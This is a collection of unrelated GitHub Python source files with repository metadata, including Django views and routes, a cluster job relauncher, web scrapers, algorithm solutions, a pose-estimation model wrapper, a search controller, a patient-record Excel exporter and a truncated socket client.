'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n })\n\n elif datacontent == '2학년6반시간표':\n\n return JsonResponse({\n 'message': {\n 'text': class26\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n\n })\n\n elif datacontent == '처음으로':\n\n return JsonResponse({\n 'message': {\n 'text': '처음으로'\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n\n })\n elif datacontent == '중식':\n\n return JsonResponse({\n 'message': {\n 'text': mealM\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n })\n\n\n elif datacontent == '석식':\n\n return JsonResponse({\n 'message': {\n 'text': mealD\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n })\n","repo_name":"rhaxlwo21/ydp_alarm_with_kakaoApi","sub_path":"2018_06_20_views.py","file_name":"2018_06_20_views.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5477612308","text":"from django.urls import path, include\nfrom work.views import WorkListCreateAPIView, WorkRetrieveUpdateDestroyAPIView, WorkCommentListCreateAPIView, WorkCommentRetrieveUpdateDestroyAPIView, WorkLikeListCreateAPIView\nfrom bookmark.views import WorkBookmarkListCreateAPIView, WorkBookmarkRetrieveDestroyAPIView\n\n\napp_name = 'work'\n\nurlpatterns = [\n # work\n path(\"\", WorkListCreateAPIView.as_view()),\n path(\"/\", WorkRetrieveUpdateDestroyAPIView.as_view()),\n # work - like\n path(\"/likes/\", WorkLikeListCreateAPIView.as_view()),\n # work - bookmark\n path(\"/work_bookmarks/\", WorkBookmarkListCreateAPIView.as_view()),\n path(\"/work_bookmarks//\", WorkBookmarkRetrieveDestroyAPIView.as_view()),\n # work - workComment\n path(\"/work_comments/\", WorkCommentListCreateAPIView.as_view()),\n path(\"/work_comments//\", WorkCommentRetrieveUpdateDestroyAPIView.as_view()),\n]\n","repo_name":"KimChanJin97/test","sub_path":"webapp/work/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25247176002","text":"# ---------- Utility script ----------\n# Check simulations that failed and launch them again on the cluster\n# ____________________\n# Valérie Bibeau, 2020\n\nimport os\nimport numpy as np\n\npath = os.getcwd() + \"/\"\n\npath, dirs, files = next(os.walk(path))\nnumber_of_dirs = len(dirs)\n\nprint (\"Total of folders =\", number_of_dirs)\nprint (\"Set the first mixer to simulate :\")\nstart = int(input())\nprint (\"Set the last mixer to simulate :\")\nstop = int(input())\n\ntotal_mixer = stop - start + 1\n\nnumber_of_mixers = np.linspace(start,stop,total_mixer,dtype=int)\n\nfor i in number_of_mixers:\n geo_path = path + '/mixer_' + str(i)\n os.chdir(geo_path)\n\n path, dirs, files = next(os.walk(geo_path))\n for j in np.linspace(1, len(dirs), len(dirs), dtype=int):\n os.chdir(geo_path + '/mixer_' + str(j))\n try:\n with open(\"torque.00.dat\",\"r\") as fic_torque:\n lines = fic_torque.readlines()\n fic_torque.close()\n\n if len(lines) != 2:\n raise\n\n print(\"mixer_\" + str(i) + '-' + str(j) + \" is OK!\")\n\n except:\n print(\"********** \" + \"mixer_\" + str(i) + '-' + str(j) + \" will be launched again! **********\")\n os.system('cp ../../new_launch.sh .')\n os.system('sbatch -J ' + \"mixer_\" + str(i) + '-' + str(j) + ' new_launch.sh')\n","repo_name":"bibeauv/mixer-database","sub_path":"utilities/check_and_launch.py","file_name":"check_and_launch.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13587712664","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep\t1 12:54:10 2020\n\n@author: Nikola\n\"\"\"\n\n\nimport sys, requests as reqs, datetime\nfrom bs4 import BeautifulSoup\n\ndef main():\n\t\n\t\n\turl = 'https://www.telegraf.rs/'\n\t\n\ttelegraf = reqs.get(url)\n\ttelegraf.raise_for_status()\n\t\n\tpage = BeautifulSoup(telegraf.text, 'html.parser')\n\t\n\tall_news = page.findAll('div', {'class' : 'grid-image-wrapper'})\n\t\n\tres = dict()\n\t\n\tfor news in all_news:\n\t\ttitle = news.a['title']\n\t\tlink = news.a['href']\n\t\tres[title] = link\n\t\t\n\treturn res\n\t\t\t\t\nif __name__ == '__main__':\n\tnews = main()\t\t\t\t \n\t\n\tfor k,v in news.items():\n\t\tprint(v)","repo_name":"SquareNode/stanjeportala","sub_path":"scripts/telegraf.py","file_name":"telegraf.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17204108190","text":"class Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n intervals.sort(key=lambda interval: interval[0])\n res = [intervals[0]]\n prev_end = intervals[0][1]\n for i in range(1, len(intervals)):\n interval = intervals[i]\n start, end = interval\n if start <= prev_end:\n res[-1][1] = max(res[-1][1], end)\n else:\n res.append(interval)\n prev_end = res[-1][1]\n return res\n","repo_name":"hotsno/blind-75","sub_path":"solutions/56. Merge Intervals.py","file_name":"56. Merge Intervals.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"69869890981","text":"class Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \n visited = [[False for _ in range(len(grid[0]))] for _ in range(len(grid))]\n \n count = 0\n \n for i in range(len(grid)):\n for j in range(len(grid[0])):\n \n if visited[i][j] == False and grid[i][j] == \"1\":\n self.dfs(i, j, visited, grid)\n count += 1\n \n return count\n \n \n \n def dfs(self, i, j, visited, grid):\n \n visited[i][j] = True\n \n if i-1 >= 0 and not visited[i-1][j] and grid[i-1][j] == \"1\":\n self.dfs(i-1, j, visited, grid)\n \n if i+1 <= len(grid) - 1 and not visited[i+1][j] and grid[i+1][j] == \"1\":\n self.dfs(i+1, j, visited, grid)\n \n if j - 1 >= 0 and not visited[i][j-1] and grid[i][j-1] == \"1\":\n self.dfs(i, j-1, visited, grid)\n \n if j + 1 <= len(grid[0]) - 1 and not visited[i][j+1] and grid[i][j+1] == \"1\":\n self.dfs(i, j+1, visited, grid)\n \n \n \n ","repo_name":"Vamsi995/LeetCode-Python","sub_path":"200-number-of-islands/200-number-of-islands.py","file_name":"200-number-of-islands.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74254274340","text":"from neuron import h\nimport random as rnd\nimport numpy as np\n\nclass stim_protocol():\n \n def __init__(self,\n cell,\n p,\n rank = 0):\n\n # Add parameters to protocol\n self.p = p\n self.seed = 123881\n rnd.seed(self.seed)\n # Start protocol\n self.stimulators = {}\n\n # Initial time lag\n start_next = 0\n\n # Stabilization of membrane potential\n start_next += 0\n\n # pre induction EPSP Test \n self.test_pre = h.NetStim()\n self.test_pre.start = start_next # start_next # ms\n self.test_pre.interval = 1e3/self.p['test_freq'] # ms -> 20 sec\n self.test_pre.number = int(self.p['time_on_initialization'] / self.test_pre.interval) # 200\n self.test_pre.noise = 0\n if p['check']:\n print(('Begin sim',start_next))\n \n self.nc_test_pre = []\n self.nc_test_pre_nmda = []\n for spine in cell.spines:\n self.nc_test_pre.append(h.NetCon(self.test_pre, spine.head.AMPA,0,0,1))\n self.nc_test_pre_nmda.append(h.NetCon(self.test_pre, spine.head.NMDA,0,0,1))\n self.stimulators['test_pre_spike_times'] = h.Vector()\n self.nc_test_pre[-1].record(self.stimulators['test_pre_spike_times'])\n\n start_next += self.p['time_on_initialization']\n if p['check']:\n print(('End PRE',start_next))\n \n\n # Induction protocol\n self.stim = h.NetStim()\n start_next += self.p['time_to_begin_induction']\n self.stim.start = start_next # ms\n self.p['time_start_induction_stimuli'] = self.stim.start\n self.stim.number = self.p['nstim'] # 200\n self.stim.interval = 1e3/self.p['induction_freq'] # ms 0.5 Hz = 2 s\n self.stim.noise = 0\n if p['check']:\n print(('Begin induction',start_next))\n \n\n self.nc_stim = []\n self.nc_stim_nmda = []\n synaptic_delays = np.linspace(0,p['sp_delay_env'],len(cell.spines))\n for spine,delay in zip(cell.spines,synaptic_delays):\n spine.delay = delay #rnd.uniform(0,p['sp_delay_env'])\n self.nc_stim.append(h.NetCon(self.stim, spine.head.AMPA,0,spine.delay,1))\n self.nc_stim_nmda.append(h.NetCon(self.stim, spine.head.NMDA,0,spine.delay,1))\n self.stimulators['induction_spikes'] = h.Vector()\n self.nc_stim[-1].record(self.stimulators['induction_spikes'])\n\n # during induction EPSP Test \n self.test_during = h.NetStim()\n self.test_during.start = start_next + 1e3/self.p['induction_freq']/2 # ms\n if p['check']:\n print((\"DURING\",self.test_during.start, 1e3/self.p['induction_freq']/2))\n self.test_during.interval = 1e3/self.p['test_freq'] # ms -> 20 sec\n self.test_during.number = int(self.stim.number*self.stim.interval / self.test_during.interval)\n self.test_during.noise = 0\n\n self.nc_test_during = []\n self.nc_test_during_nmda = []\n for spine in cell.spines:\n self.nc_test_during.append(h.NetCon(self.test_during, spine.head.AMPA,0,0,1))\n self.nc_test_during_nmda.append(h.NetCon(self.test_during, spine.head.NMDA,0,0,1))\n self.stimulators['test_during_spike_times'] = h.Vector()\n self.nc_test_during[-1].record(self.stimulators['test_during_spike_times'])\n\n # BPAP self.stimulation \n IC_dep = self.stimulators['IC_dep'] = []\n IC_hyp = self.stimulators['IC_hyp'] = []\n IC_delays = self.stimulators['IC_delays'] = []\n for s in range(self.p['nstim']):\n IC_dep.append([])\n IC_hyp.append([])\n IC_delays.append(start_next + self.stim.interval * s - p['IC_delay_to_spike'])\n for ap in range(4):\n IC_dep[-1].append(h.IClamp(0.5, sec = cell.cell.soma))\n IC_hyp[-1].append(h.IClamp(0.5, sec = cell.cell.soma))\n IC_dep[-1][ap].amp = p['BPAP_stimulus_amplitude'] # nA\n IC_dep[-1][ap].delay = IC_delays[-1] + ap*5# ms\n IC_dep[-1][ap].dur = p['BPAP_dep_stimulus_duration'] # ms\n\n IC_hyp[-1][ap].amp = -0.02 # nA\n IC_hyp[-1][ap].delay = IC_dep[-1][ap].delay + IC_dep[-1][ap].dur # ms\n IC_hyp[-1][ap].dur = p['BPAP_hyp_stimulus_duration'] # ms\n # self.stimulators['IC_dep'].append(h.IClamp(0.5, sec = cell.cell.branch_base))\n # self.stimulators['IC_hyp'].append(h.IClamp(0.5, sec = cell.cell.branch_base))\n # self.stimulators['IC_dep'][-1].amp = self.p['BPAP_stimulus_ampitude'] # nA\n # self.stimulators['IC_dep'][-1].delay = start_next + self.stim.interval * s - self.p['IC_delay_to_spike'] # ms\n # self.stimulators['IC_delays'].append(self.stimulators['IC_dep'][-1].delay)\n # self.stimulators['IC_dep'][-1].dur = self.p['BPAP_dep_stimulus_duration'] # ms\n\n # self.stimulators['IC_hyp'][-1].amp = -0.02 # nA\n # self.stimulators['IC_hyp'][-1].delay = self.stimulators['IC_dep'][-1].delay + self.stimulators['IC_dep'][-1].dur # ms\n # self.stimulators['IC_hyp'][-1].dur = self.p['BPAP_hyp_stimulus_duration'] # ms\n\n\n self.time_of_induction = self.p['nstim'] * self.stim.interval\n start_next += self.time_of_induction\n self.time_end_induction = start_next\n if p['check']:\n print(('End induction',start_next))\n\n # Post induction EPSP test during expression\n self.test_post = h.NetStim()\n start_next += self.p['time_after_induction']\n self.test_post.start = start_next # ms\n self.test_post.number = 1e4 \n self.test_post.interval = 1e3/self.p['test_freq'] # ms = 0.05 Hz = 20 sec\n self.test_post.noise = 0\n\n self.nc_test_post = []\n self.nc_test_post_nmda = []\n for spine in cell.spines:\n self.nc_test_post.append(h.NetCon(self.test_post, spine.head.AMPA,0,0,1))\n self.nc_test_post_nmda.append(h.NetCon(self.test_post, spine.head.NMDA,0,0,1))\n start_next += self.p['time_of_expression'] #ms\n self.stimulators['test_post_spike_times'] = h.Vector()\n self.nc_test_post[-1].record(self.stimulators['test_post_spike_times'])\n\n # cell.spines[0].head.plot('cai')\n # dend.plot('v')\n # # h('load_file(\"Tests/Test_ampa.ses\")')\n # # h('load_file(\"Tests/Test_ampa_30min.ses\")')\n\n # Remve the induction self.stimulus\n if self.p['activate_LTP_protocol']:\n self.stim.number = self.p['nstim']\n else:\n self.stim.number = 0\n\n ##### Initialization ########\n h.v_init = self.p['Vrest'] # mV\n self.p['tstop'] = start_next\n h.init()\n if p['check']:\n print(('Setup finished on cpu %g tstop %g'%(rank,h.tstop)))\n\n\n","repo_name":"ModelDBRepository/244412","sub_path":"protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34774217224","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport logging\n\nimport torch\nimport torch.nn as nn\n# import timm\nimport math\nfrom .tokenpose_base import TokenPose_S_base\n\nBN_MOMENTUM = 0.1\nlogger = logging.getLogger(__name__)\n\nclass TokenPose_S(nn.Module):\n\n def __init__(self, cfg, **kwargs):\n\n extra = cfg.MODEL.EXTRA\n\n super(TokenPose_S, self).__init__()\n\n print(cfg.MODEL)\n ##################################################\n self.features = TokenPose_S_base(image_size=[cfg.MODEL.IMAGE_SIZE[1],cfg.MODEL.IMAGE_SIZE[0]],patch_size=[cfg.MODEL.PATCH_SIZE[1],cfg.MODEL.PATCH_SIZE[0]],\n num_keypoints = cfg.MODEL.NUM_JOINTS,dim =cfg.MODEL.DIM,\n channels=256,\n depth=cfg.MODEL.TRANSFORMER_DEPTH,heads=cfg.MODEL.TRANSFORMER_HEADS,\n mlp_dim = cfg.MODEL.DIM*cfg.MODEL.TRANSFORMER_MLP_RATIO,\n apply_init=cfg.MODEL.INIT,\n hidden_heatmap_dim=cfg.MODEL.HEATMAP_SIZE[1]*cfg.MODEL.HEATMAP_SIZE[0]//8,\n heatmap_dim=cfg.MODEL.HEATMAP_SIZE[1]*cfg.MODEL.HEATMAP_SIZE[0],\n heatmap_size=[cfg.MODEL.HEATMAP_SIZE[1],cfg.MODEL.HEATMAP_SIZE[0]],\n pos_embedding_type=cfg.MODEL.POS_EMBEDDING_TYPE)\n ###################################################3\n\n def forward(self, x):\n x = self.features(x)\n return x\n\n def init_weights(self, pretrained=''):\n if os.path.isfile(pretrained):\n logger.info('=> init final conv weights from normal distribution')\n for m in self.final_layer.modules():\n if isinstance(m, nn.Conv2d):\n logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))\n logger.info('=> init {}.bias as 0'.format(name))\n nn.init.normal_(m.weight, std=0.001)\n nn.init.constant_(m.bias, 0)\n\n pretrained_state_dict = torch.load(pretrained)\n logger.info('=> loading pretrained model {}'.format(pretrained))\n from collections import OrderedDict\n state_tmp = OrderedDict()\n for name, param in pretrained_state_dict.items():\n num = name.split(\".\")[1]\n if num != \"19\":\n continue\n state_tmp[name] = param\n\n self.load_state_dict(state_tmp, strict=False)\n else:\n logger.info('=> init weights from normal distribution')\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight, std=0.001)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.ConvTranspose2d):\n nn.init.normal_(m.weight, std=0.001)\n if self.deconv_with_bias:\n nn.init.constant_(m.bias, 0)\n\n\ndef get_pose_net(cfg, is_train, **kwargs):\n model = TokenPose_S(cfg, **kwargs)\n if is_train and cfg.MODEL.INIT_WEIGHTS:\n model.init_weights(cfg.MODEL.PRETRAINED)\n\n return model\n","repo_name":"leeyegy/TokenPose","sub_path":"lib/models/pose_tokenpose_s.py","file_name":"pose_tokenpose_s.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"35"} +{"seq_id":"27862143742","text":"dirs = {'^': 1j, 'v': -1j, '>': 1, '<': -1}\n\nhouses_p1, pos = set(), 0\nhouses_p2, pos1, pos2 = set(), 0, 0\nhouses_p1.add(0); houses_p2.add(0)\nfor i, d in enumerate(open('d03.txt').read()):\n pos += dirs[d]\n houses_p1.add(pos)\n if i % 2 == 0:\n pos1 += dirs[d]\n houses_p2.add(pos1)\n else:\n pos2 += dirs[d]\n houses_p2.add(pos2)\nprint(len(houses_p1))\nprint(len(houses_p2))","repo_name":"olamberti/advent-of-code","sub_path":"2015/d03.py","file_name":"d03.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"126080980","text":"import logging\nimport traceback\nimport urllib\nfrom pylons.i18n.translation import _\nfrom pylons import request, config, tmpl_context as c\n\nfrom whoosh.index import open_dir, EmptyIndexError\nfrom whoosh.qparser import QueryParser, QueryParserError\nfrom whoosh.query import Phrase, Prefix\nfrom webhelpers.util import update_params\n\nfrom kallithea.lib.auth import LoginRequired\nfrom kallithea.lib.base import BaseRepoController, render\nfrom kallithea.lib.indexers import CHGSETS_SCHEMA, SCHEMA, CHGSET_IDX_NAME, \\\n IDX_NAME, WhooshResultWrapper\nfrom kallithea.model.repo import RepoModel\nfrom kallithea.lib.utils2 import safe_str, safe_int\nfrom kallithea.lib.helpers import Page\n\nlog = logging.getLogger(__name__)\n\n\nclass SearchController(BaseRepoController):\n\n def __before__(self):\n super(SearchController, self).__before__()\n\n @LoginRequired()\n def index(self, repo_name=None):\n c.repo_name = repo_name\n c.formated_results = []\n c.runtime = ''\n c.cur_query = request.GET.get('q', None)\n c.cur_type = request.GET.get('type', 'content')\n c.cur_search = search_type = {'content': 'content',\n 'commit': 'message',\n 'path': 'path',\n 'repository': 'repository'\n }.get(c.cur_type, 'content')\n\n index_name = {\n 'content': IDX_NAME,\n 'commit': CHGSET_IDX_NAME,\n 'path': IDX_NAME\n }.get(c.cur_type, IDX_NAME)\n\n schema_defn = {\n 'content': SCHEMA,\n 'commit': CHGSETS_SCHEMA,\n 'path': SCHEMA\n }.get(c.cur_type, SCHEMA)\n\n log.debug('IDX: %s' % index_name)\n log.debug('SCHEMA: %s' % schema_defn)\n\n if c.cur_query:\n cur_query = c.cur_query.lower()\n log.debug(cur_query)\n\n if c.cur_query:\n p = safe_int(request.GET.get('page', 1), 1)\n highlight_items = set()\n try:\n idx = open_dir(config['app_conf']['index_dir'],\n indexname=index_name)\n searcher = idx.searcher()\n\n qp = QueryParser(search_type, schema=schema_defn)\n if c.repo_name:\n cur_query = u'repository:%s %s' % (c.repo_name, cur_query)\n try:\n query = qp.parse(unicode(cur_query))\n # extract words for highlight\n if isinstance(query, Phrase):\n highlight_items.update(query.words)\n elif isinstance(query, Prefix):\n highlight_items.add(query.text)\n else:\n for i in query.all_terms():\n if i[0] in ['content', 'message']:\n highlight_items.add(i[1])\n\n matcher = query.matcher(searcher)\n\n log.debug('query: %s' % query)\n log.debug('hl terms: %s' % highlight_items)\n results = searcher.search(query)\n res_ln = len(results)\n c.runtime = '%s results (%.3f seconds)' % (\n res_ln, results.runtime\n )\n\n def url_generator(**kw):\n q = urllib.quote(safe_str(c.cur_query))\n return update_params(\"?q=%s&type=%s\" \\\n % (q, safe_str(c.cur_type)), **kw)\n repo_location = RepoModel().repos_path\n c.formated_results = Page(\n WhooshResultWrapper(search_type, searcher, matcher,\n highlight_items, repo_location),\n page=p,\n item_count=res_ln,\n items_per_page=10,\n url=url_generator\n )\n\n except QueryParserError:\n c.runtime = _('Invalid search query. Try quoting it.')\n searcher.close()\n except (EmptyIndexError, IOError):\n log.error(traceback.format_exc())\n log.error('Empty Index data')\n c.runtime = _('There is no index to search in. '\n 'Please run whoosh indexer')\n except (Exception):\n log.error(traceback.format_exc())\n c.runtime = _('An error occurred during search operation.')\n\n # Return a rendered template\n return render('/search/search.html')\n","repo_name":"msabramo/kallithea","sub_path":"kallithea/controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"34298840304","text":"#!/usr/bin/env python3\nimport os\n\n\ndef speedpi():\n speedtest = \"/usr/local/bin/speedtest-cli \"\n # add arguments\n speedtest = speedtest + \"--csv \"\n # specify output file\n speedtest = speedtest + \">> speedpi/speedtests.csv\"\n\n # start the command\n os.system(speedtest)\n\n\nif __name__ == \"__main__\":\n speedpi()","repo_name":"hitbear/speedpi","sub_path":"src/speedpi.py","file_name":"speedpi.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73755954982","text":"\"\"\"\nPatient Excel Exporter.\n\nExports the current patient's details from the mongoDB database\n\"\"\"\n\nimport sys\nfrom datetime import datetime\nfrom os import chdir\nfrom os.path import exists\nfrom time import sleep\n\nimport numpy as np\nfrom openpyxl import Workbook\nfrom pymongo import MongoClient\n\nchdir(sys.argv[1]) if sys.argv[1] else sys.exit()\n\nclient = MongoClient('localhost', 27017)\ndb = client['mnd-dashboard']\npatients = db.patients.find()\n\n\ndef findClosestDate(date, array):\n \"\"\"Find the closest appointment to the date.\"\"\"\n diff = [abs(date - x).days for x in array]\n return np.argmin(diff)\n\n\ndest_filename = 'patientsExport.xlsx'\nwb = Workbook()\nws = wb.active\nheading = ['Name', 'DOB', 'DOD', 'Ethnicity', 'Onset date',\n 'Age at onset', 'Diagnosis date', 'Age at diagnosis',\n 'ALSFRS-R at diagnosis', 'ALSFRS-R at RIG', 'ALSFRS-R at NIV',\n 'ESS at diagnosis', 'ESS at RIG', 'ESS at NIV', 'Weight at Diagnosis', 'Weight before RIG',\n 'Weight on RIG date', 'RIG date', 'Age at RIG date',\n 'NIV date', 'Age at NIV date', 'Duration of disease',\n 'Place of death', 'MND Type']\nws.append(heading)\nfor p in patients:\n name = '%s %s' % (p['firstName'], p['lastName'])\n dob = p['dateOfBirth'].strftime('%d/%m/%Y') if p['dateOfBirth'] else None\n dod = p['deathDate'].strftime('%d/%m/%Y') if p['deathDate'] else None\n ethnicity = p['ethnicity']\n onset = p['onsetDate'].strftime('%d/%m/%Y') if p['onsetDate'] else None\n ageAtOnset = p['onsetDate'].year - p['dateOfBirth'].year if p['onsetDate'] else None\n diagnosisDate = p['diagnosisDate'].strftime('%d/%m/%Y') if p['diagnosisDate'] else None\n ageAtDiagnosis = p['diagnosisDate'].year - p['dateOfBirth'].year if p['diagnosisDate'] else None\n if 'appointments' in p:\n appointmentDates = np.array([x['clinicDate'] for x in p['appointments']])\n if p['diagnosisDate']:\n diagnosisIndex = findClosestDate(p['diagnosisDate'], appointmentDates)\n alsfrsAtDiagnosis = p['appointments'][diagnosisIndex]['alsfrs']['total']\n essAtDiagnosis = p['appointments'][diagnosisIndex]['ess']['total']\n weightAtDiagnosis = p['appointments'][0]['weight'] / 100\n else:\n alsfrsAtDiagnosis = None\n essAtDiagnosis = None\n weightAtDiagnosis = None\n if p['gastrostomyDate']:\n RIGindex = findClosestDate(p['gastrostomyDate'], appointmentDates)\n weightBeforeRIG = p['appointments'][RIGindex]['weight'] / 100\n alsfrsBeforeRIG = p['appointments'][RIGindex]['alsfrs']['total']\n essBeforeRIG = p['appointments'][RIGindex]['ess']['total']\n weightOnRIG = p['appointments'][-1]['weight'] / 100\n RIGdate = p['gastrostomyDate'].strftime('%d/%m/%Y')\n ageAtRIG = p['gastrostomyDate'].year - p['dateOfBirth'].year\n else:\n weightBeforeRIG = None\n alsfrsBeforeRIG = None\n essBeforeRIG = None\n weightOnRIG = None\n RIGdate = None\n ageAtRIG = None\n if p['nivDate']:\n NIVdate = p['nivDate'].strftime('%d/%m/%Y')\n ageAtNIV = p['nivDate'].year - p['dateOfBirth'].year\n if 'appointments' in p:\n NIVIndex = findClosestDate(p['nivDate'], appointmentDates)\n alsfrsAtNIV = p['appointments'][NIVIndex]['alsfrs']['total']\n essAtNIV = p['appointments'][NIVIndex]['ess']['total']\n else:\n alsfrsAtNIV = None\n essAtNIV = None\n else:\n alsfrsAtDiagnosis = None\n essAtDiagnosis = None\n weightAtDiagnosis = None\n\n weightBeforeRIG = None\n alsfrsBeforeRIG = None\n essBeforeRIG = None\n weightOnRIG = None\n RIGdate = None\n ageAtRIG = None\n\n NIVdate = None\n ageAtNIV = None\n alsfrsAtNIV = None\n essAtNIV = None\n durationofDisease = abs(datetime.now() - p['diagnosisDate']).days if p['diagnosisDate'] else None\n placeOfDeath = p['deathPlace']\n MNDType = p['mndType']\n data = [name, dob, dod, ethnicity, onset,\n ageAtOnset, diagnosisDate, ageAtDiagnosis,\n alsfrsAtDiagnosis, alsfrsBeforeRIG, alsfrsAtNIV, essAtDiagnosis, essBeforeRIG, essAtNIV, weightAtDiagnosis, weightBeforeRIG,\n weightOnRIG, RIGdate, ageAtRIG, NIVdate,\n ageAtNIV, durationofDisease, placeOfDeath, MNDType]\n ws.append(data)\n\nwb.save(filename=dest_filename)\nwhile not exists(dest_filename):\n sleep(1)\n","repo_name":"Darkbladecr/MND-patient-dashboard","sub_path":"server/apis/patientsExport.py","file_name":"patientsExport.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"845335959","text":"# coding = utf-8\n\nimport requests\nfrom lxml import html\n\nLOGIN_URL = 'https://github.com/login'\nSESSION_URL = 'https://github.com/session'\n\ns = requests.session()\nr = s.get(LOGIN_URL)\n\n#获取浏览器返回的HTML文本\ntree = html.fromstring(r.text)\n# 利用lxml中的xpath 获取有用的待提交的data信息\nel = tree.xpath('//input[@name=\"authenticity_token\"]')[0]\n\nauthenticity_token = el.attrib['value']\n\n# 构建数据信息\ndata = {\n 'commit': 'Sign in',\n 'utf8': '✓',\n 'authenticity_token': authenticity_token,\n 'login': username,\n 'password': password\n}\n\nheaders = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'\n}\n\nr = s.post(SESSION_URL, data=data, headers=headers)\n#print(r.text)\ntree = html.fromstring(r.text)\nprint(tree)\nel = tree.xpath('//ul[@class=\"mini-repo-list\"]')[0]\nprint(el)\n","repo_name":"superliuliuliu/pythonspider","sub_path":"gitspider.py","file_name":"gitspider.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7554580543","text":"def canAttendMeetings(intervals):\n # Sort the array first so that the starting time is in ascending order\n intervals.sort()\n\n # Need to do -1 so that it stays in bounds\n for i in range(len(intervals) - 1):\n # i1 = current meeting, i2 = next meeting\n i1 = intervals[i]\n i2 = intervals[i + 1]\n\n # If current meeting's end time is greater than next meeting's start time:\n if i1[1] > i2[0]:\n return False\n\n return True","repo_name":"nickyjhong/dsa","sub_path":"leetcode/easy/252-meetingRooms.py","file_name":"252-meetingRooms.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"43473141881","text":"import json\nfrom threading import Thread, Lock\nimport socket\nimport sys\nimport time\n\n\nclass Client():\n \"\"\"\n Client is initialized with client_port as a parameter\n \"\"\"\n def __init__(self, client_port):\n self.identifier = client_port\n self.server_tcp = ('127.0.0.1', 8889)\n self.lock = Lock()\n self.server_listener = SocketThread(\n self, client_port, self.server_tcp, self.lock)\n self.server_listener.start()\n self.server_message = []\n\n \"\"\"\n Used to send messages to the server.\n \"\"\"\n def send_msg(self, action, play=None, msg=None):\n message = json.dumps({\n \"action\": action,\n \"payload\": play,\n \"message\": msg,\n \"player_id\": self.identifier\n })\n\n self.sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock_tcp.connect(self.server_tcp)\n \"\"\"\n If the action is test then the client sends a message 50000 amounts to the server\n to measure how long it takes for the messages to arrive. The sleep is so that the\n server can prepare to accept messages.\n \"\"\"\n if action == 'test':\n self.sock_tcp.send(message.encode())\n time.sleep(1)\n for i in range(50000):\n self.sock_tcp.send(message.encode())\n self.sock_tcp.close()\n else:\n self.sock_tcp.send(message.encode())\n data = self.sock_tcp.recv(1024)\n self.sock_tcp.close()\n message = self.parse_data(data)\n\n print(message)\n\n \"\"\"\n Parses messages from the server if the succes code is True. If not raises an Exception\n \"\"\"\n\n def parse_data(self, data):\n try:\n data = json.loads(data)\n if data['success'] == \"True\":\n return data['message']\n else:\n raise Exception(data['message'])\n except ValueError:\n print(data)\n \"\"\"\n Gets servers messages to print\n \"\"\"\n def get_messages(self):\n\n message = self.server_message\n self.server_message = []\n return set(message)\n\n\nclass SocketThread(Thread):\n\n \"\"\"\n Initializes SocketThread which is used to listen to the servers messages.\n Initialized with servers address.\n \"\"\"\n def __init__(self, client, client_port, server_tcp, lock):\n\n Thread.__init__(self)\n self.client = client\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.bind((\"0.0.0.0\", 